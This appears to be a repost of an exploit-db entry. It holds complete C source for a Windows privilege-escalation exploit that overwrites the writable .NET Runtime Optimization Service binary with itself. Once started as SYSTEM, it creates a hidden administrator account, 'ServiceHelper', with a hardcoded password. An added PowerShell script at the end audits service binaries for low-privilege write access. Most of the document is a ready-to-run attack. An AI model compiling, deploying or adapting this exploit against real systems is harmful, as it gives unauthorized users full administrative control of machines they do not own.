.NET Runtime Optimization Service 0day privilege escalation

Source: Internet
Author: User

Address: http://www.exploit-db.com/exploits/16940/

/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE: n/


Xenomuta [at] tuxfamily.org
Xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256 mg

This one's a no-brainer, plain simple:

This service's EXE file can be overwritten by any non-admin domain user
and by local Power Users (which is the default permission set on the file).
This exploit compiles to a service that uses the original service's ID.

Tested on Windows 2003, WinXP (sp3) and Win7
(My guess is that it runs on any win box running this service).

Greetz to fr1t0l4y, L. Garay, siriguillo and the c0ff33 br34k t34m !!

Bless yall!

*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

#define PWN_EXE   "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT "mscorsvw.exe"
#define PWN_NAME  ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID    "clr_optimization_v2.0.50727_32"

void ControlHandler(DWORD request);
int  InitService(void);

/* Called by the SCM once the replaced binary is started under the service's identity. */
void ServiceMain(int argc, char **argv) {
    ServiceStatus.dwServiceType      = SERVICE_WIN32_OWN_PROCESS;
    ServiceStatus.dwCurrentState     = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;

    /* Register the control handler so that SetServiceStatus has a valid handle. */
    hStatus = RegisterServiceCtrlHandler(PWN_ID, (LPHANDLER_FUNCTION)ControlHandler);
    if (hStatus == (SERVICE_STATUS_HANDLE)0)
        return;

    /* InitService() returns the exit status of the shell commands: non-zero means failure. */
    if (InitService()) {
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = -1;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    }
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);
}

/* Minimal control handler: acknowledge stop/shutdown requests from the SCM. */
void ControlHandler(DWORD request) {
    if (request == SERVICE_CONTROL_STOP || request == SERVICE_CONTROL_SHUTDOWN) {
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = 0;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
}

int main(int argc, char **argv) {
    char  acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);

    /* Not running as SYSTEM: this is the user-launched copy, so swap the service binary. */
    if (strcmp(acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
            fprintf(stderr, ":( sorry, can't write to file.\n");
            exit(1);
        }
        CopyFile(argv[0], PWN_EXE, TRUE);   /* TRUE == fail if the target already exists */
        snprintf(str, 2048, "net start \"%s\" 2> NUL", PWN_NAME);
        printf(">:D should have created a Username: ServiceHelper Password: ILov3Coff33!\n");
        system(str);
    }

    /* Running as SYSTEM: we were started by the SCM, so behave as the service. */
    SERVICE_TABLE_ENTRY ServiceTable[2];

    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcher(ServiceTable);

    return 0;
}

int InitService(void) {
    /* Executed under the service account: creates the user and adds it to Administrators. */
    return system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}
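As an added defender's check, not part of the original exploit or of XenoMuta's code: a PowerShell audit that lists every installed service whose executable grants write-type rights to Everyone, Authenticated Users, Users or Power Users, which is the file-permission misconfiguration this advisory relies on. The list of low-privilege principals and the ImagePath parsing rules are assumptions; extend them for your own domain groups.

```powershell
# Added audit script, not part of the original exploit. Run from an elevated PowerShell.
# Flags service binaries whose DACL grants write-type rights to low-privilege principals,
# the condition the advisory above abuses (mscorsvw.exe writable by Power Users / domain users).
# The principal list below is an assumption; add your own domain groups as needed.
$lowPrivSids = @(
    'S-1-1-0',        # Everyone
    'S-1-5-11',       # Authenticated Users
    'S-1-5-32-545',   # BUILTIN\Users
    'S-1-5-32-547'    # BUILTIN\Power Users
)
# Rights that let a caller replace or alter the file. Generic rights (GENERIC_WRITE/ALL) are not expanded here.
$writeMask = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::WriteDacl -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceBinaryPath([string]$PathName) {
    # ImagePath may be quoted, unquoted with trailing arguments, or contain %SystemRoot%.
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p.StartsWith('"')) { return $p.Split('"')[1] }
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $p.Split(' ')[0]
}

function Test-LowPrivWritable([string]$File) {
    # Returns a description of the first offending ACE, or $null if none is found.
    $acl = Get-Acl -LiteralPath $File -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned or untranslatable SID
        if (($lowPrivSids -contains $sid) -and (([int]$ace.FileSystemRights) -band [int]$writeMask)) {
            return "$($ace.IdentityReference): $($ace.FileSystemRights)"
        }
    }
    return $null
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
    $hit = Test-LowPrivWritable $bin
    if ($hit) {
        [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Binary = $bin; WritableBy = $hit }
    }
} | Format-Table -AutoSize
```

Any service reported here that runs as LocalSystem is exposed in the same way as the .NET optimization service above; the fix is to remove the offending ACE (or restore the vendor's default ACL) rather than to rename the binary.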
